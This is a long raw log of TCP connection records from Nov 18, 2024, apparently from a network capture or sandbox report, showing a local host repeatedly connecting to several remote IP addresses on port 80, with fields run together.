                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.564318895 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.571918011 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.576945066 CET805020318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.577008009 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.577107906 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.577126026 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.582174063 CET805020318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.582294941 CET805020318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.417339087 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.418436050 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.424869061 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.424932003 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.432499886 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437623024 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437685966 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437778950 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.437798977 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.444259882 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.445385933 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.724073887 CET5020380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.725521088 CET5020580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.730407000 CET805020518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.730482101 CET5020580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.730614901 CET5020580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.730638027 CET5020580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.735697031 CET805020518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:35.735713005 CET805020518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.917203903 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.917351961 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.923163891 CET805020447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.923264980 CET5020480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.929750919 CET5020680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.935427904 CET805020644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.935533047 CET5020680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.935650110 CET5020680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.935669899 CET5020680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.941605091 CET805020644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:36.941642046 CET805020644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.208954096 CET805020518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.217096090 CET5020580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.223233938 CET805020518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.223330975 CET5020580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.231115103 CET5020780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.236923933 CET805020718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.237098932 CET5020780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.237214088 CET5020780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.237214088 CET5020780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.247607946 CET805020718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.247700930 CET805020718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.611366987 CET805020644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.613843918 CET5020680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.620198965 CET805020644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.620271921 CET5020680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.802123070 CET5020880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.807374954 CET805020844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.807498932 CET5020880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.807584047 CET5020880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.807596922 CET5020880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.812642097 CET805020844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:37.812664032 CET805020844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.083719015 CET805020718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.084038019 CET5020780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.089850903 CET805020718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.090245008 CET5020780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.101078987 CET5020980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.109170914 CET805020934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.109292030 CET5020980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.109486103 CET5020980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.109544039 CET5020980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.114407063 CET805020934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.114507914 CET805020934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.479617119 CET805020844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.479876995 CET5020880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.485680103 CET805020844.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.485773087 CET5020880192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.492194891 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.497148037 CET805021018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.497273922 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.497415066 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.497428894 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.502175093 CET805021018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.502716064 CET805021018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.939841032 CET805020934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.954201937 CET5020980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.959733009 CET805020934.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.959785938 CET5020980192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.968300104 CET5021180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.973226070 CET805021118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.973323107 CET5021180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.973443985 CET5021180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.973469019 CET5021180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.978307009 CET805021118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:38.978431940 CET805021118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.629838943 CET805021118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.630009890 CET5021180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.635442972 CET805021118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.635513067 CET5021180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.644110918 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.649919033 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.650033951 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.650212049 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.650237083 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.656181097 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.656194925 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.945308924 CET805021018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.945595026 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.951071978 CET805021018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.951127052 CET5021080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.972574949 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977730036 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977811098 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977901936 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.977911949 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.983232975 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:39.983246088 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.496531010 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.496757984 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.501900911 CET805021235.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.501976013 CET5021280192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.522947073 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528124094 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528182983 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528624058 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.528650045 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.533488989 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.533513069 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.982690096 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.984816074 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.990464926 CET805021318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:40.990575075 CET5021380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.002197981 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007195950 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007273912 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007777929 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.007818937 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.012583971 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.012912035 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.359174967 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.359854937 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.365526915 CET805021434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.368323088 CET5021480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.380388975 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.385996103 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.386843920 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.387003899 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.387003899 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.393644094 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.393678904 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.672259092 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.708473921 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.708604097 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.718000889 CET5021580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.722909927 CET805021544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.744071007 CET5021780192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.750088930 CET805021713.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.750181913 CET5021780192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.750278950 CET5021780192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.750291109 CET5021780192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.755181074 CET805021713.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:41.755203009 CET805021713.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.064729929 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.064882994 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.070413113 CET805021644.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.070504904 CET5021680192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.080223083 CET5021880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.085047960 CET805021854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.085112095 CET5021880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.085262060 CET5021880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.085288048 CET5021880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.090214968 CET805021854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.090226889 CET805021854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.930218935 CET805021854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.930404902 CET5021880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.936206102 CET805021854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.936269045 CET5021880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.946526051 CET5021980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.951513052 CET805021935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.951643944 CET5021980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.951755047 CET5021980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.951834917 CET5021980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.956890106 CET805021935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:42.957118988 CET805021935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.195211887 CET805021713.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.195409060 CET5021780192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.201256990 CET805021713.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.201350927 CET5021780192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.208097935 CET5022080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.216270924 CET805022035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.216367960 CET5022080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.216475010 CET5022080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.216487885 CET5022080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.224596977 CET805022035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.224630117 CET805022035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.724045992 CET5021980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.725816965 CET5022180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.730729103 CET805022135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.730792999 CET5022180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.730921984 CET5022180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.730942965 CET5022180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.735740900 CET805022135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:43.735784054 CET805022135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.061631918 CET805022035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.061952114 CET5022080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.067358017 CET805022035.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.067414999 CET5022080192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.074939013 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.079864979 CET805022218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.080005884 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.080300093 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.080411911 CET5022280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.085077047 CET805022218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.085218906 CET805022218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.574141026 CET805022135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.574460983 CET5022180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.583353043 CET805022135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.583401918 CET5022180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.607350111 CET5022380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.612471104 CET805022354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.612739086 CET5022380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.612739086 CET5022380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.612739086 CET5022380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.617754936 CET805022354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:44.618432999 CET805022354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.449842930 CET805022354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.450037956 CET5022380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.455579996 CET805022354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:45.455652952 CET5022380192.168.2.754.244.188.177
